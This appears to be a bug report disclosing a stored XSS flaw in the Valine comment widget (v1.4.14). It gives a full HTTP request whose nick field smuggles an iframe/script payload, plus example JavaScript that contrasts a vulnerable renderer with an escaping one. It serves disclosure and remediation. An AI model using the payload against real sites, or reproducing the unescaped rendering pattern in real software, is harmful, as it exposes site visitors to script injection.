Closed
If you want to report a bug, please provide the following information:
Description
It is possible to embed arbitrary HTML/JavaScript in the comment (using the
nick field), thus resulting in stored XSS (cross-site scripting).
The steps to reproduce.
- Change the request body for adding a comment as follows:
POST /1.1/classes/Comment HTTP/1.1
Host: XXX.api.lncld.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
Accept: */*
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=UTF-8
Content-Length: 640
Origin: https://xxx.yyy.zzz
{
"comment": "Good! \n",
"nick": "Alex\"</a><iframe width=1 height=1 srcdoc=\"<script>console.log('Stored XSS test passed');</script>\"",
"mail": "",
"link": "",
"ua": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0",
"url": "/en/prepare/prepare/",
"QQAvatar": "",
"ip": "1.2.3.4",
"insertedAt": {
"__type": "Date",
"iso": "2020-11-04T08:30:47.526Z"
},
"ACL": {
"*": {
"read": true
}
}
}
This malicious request adds a new comment. The HTML-encoded value of the srcdoc attribute in the request is:
<script>console.log('Stored XSS test passed');</script>
The injected JavaScript executes on the vulnerable web-page for every visitor.
A minimal demo of the problem via https://jsfiddle.net or http://codepen.io/pen if possible.
Which versions of Valine, and which browser / OS are affected by this issue?
Valine: v1.4.14
All systems and browsers
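As an added illustration (not Valine's code and not part of the original report), the renderer below shows the unescaped string-interpolation pattern that produces the stored XSS described above, next to a version that entity-encodes every untrusted field and restricts the link to http(s). The markup structure, class names, the `safeHref` helper and the `injectedTags` oracle are assumptions for the example; the payload is the nick value from the report.

```javascript
// Added example, not Valine's code. The comment object is constructed here
// and reuses the nick payload from the report above.
const payload =
  'Alex"</a><iframe width=1 height=1 srcdoc="<script>console.log(\'Stored XSS test passed\');</script>"';

const comment = { nick: payload, link: '', comment: 'Good! \n' };

// Vulnerable renderer (assumed markup): the nick is interpolated straight
// into the anchor, so the closing quote and </a> in the payload terminate
// the tag and the <iframe> lands in the page as live HTML.
function renderCommentUnsafe(c) {
  const href = c.link || '#';
  return `<div class="vcomment"><a class="vnick" href="${href}">${c.nick}</a>` +
         `<p class="vcontent">${c.comment}</p></div>`;
}

// Entity-encode the five characters that can break out of text or
// double-quoted attribute context.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, ch => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[ch]);
}

// Assumed helper: only http(s) URLs are accepted for href; javascript:,
// data: and unparsable values fall back to '#'.
function safeHref(link) {
  try {
    const u = new URL(link);
    return (u.protocol === 'http:' || u.protocol === 'https:') ? u.href : '#';
  } catch {
    return '#';
  }
}

// Hardened renderer: every user-controlled value is escaped for the
// context it is placed in, so the payload survives only as literal text.
function renderCommentSafe(c) {
  return `<div class="vcomment"><a class="vnick" href="${escapeHtml(safeHref(c.link))}">${escapeHtml(c.nick)}</a>` +
         `<p class="vcontent">${escapeHtml(c.comment)}</p></div>`;
}

// Cheap oracle: list every tag in the output that the template itself does
// not emit. Anything returned here came from user input.
function injectedTags(html) {
  const allowed = new Set(['div', '/div', 'a', '/a', 'p', '/p']);
  return [...html.matchAll(/<(\/?[a-zA-Z]+)/g)]
    .map(m => m[1].toLowerCase())
    .filter(t => !allowed.has(t));
}

console.log('unsafe injected tags:', injectedTags(renderCommentUnsafe(comment)));
console.log('safe injected tags:  ', injectedTags(renderCommentSafe(comment)));
```

Running it under Node prints `iframe`, `script` and `/script` as the tags smuggled in by the unsafe renderer and an empty list for the escaped one; escaping alone does not cover `href`, which is why the link is additionally restricted to http(s) before being placed in the attribute.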
